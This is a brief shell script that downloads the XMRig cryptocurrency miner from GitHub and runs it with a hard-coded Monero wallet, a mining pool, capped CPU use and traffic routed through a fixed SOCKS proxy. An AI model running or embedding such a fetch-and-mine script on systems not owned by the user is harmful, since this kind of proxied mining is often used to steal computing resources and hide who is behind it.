#!/bin/bash
wget https://github.com/xmrig/xmrig/releases/download/v6.5.3/xmrig-6.5.3-linux-x64.tar.gz
tar --extract --file xmrig-6.5.3-linux-x64.tar.gz
export PROXY_DNS_SERVER=1.1.1.1
./xmrig-6.5.3/xmrig --no-color --donate-level 1 --cpu-priority 5 -o stratum+tcp://pool.supportxmr.com:9000 -u 4AHnjgotTyL79cjhd2kXzb6tuYFUThRJ5J9PRwh7qfgdbeNTDVdpJiK5taWCpR38eWCHFJdmRPZX55YQ5yYg4MTqGzZL2rF -p x1 -a cn/r -k --tls -x 192.111.130.2:4145 --randomx-1gb-pages --cpu-max-threads-hint 50
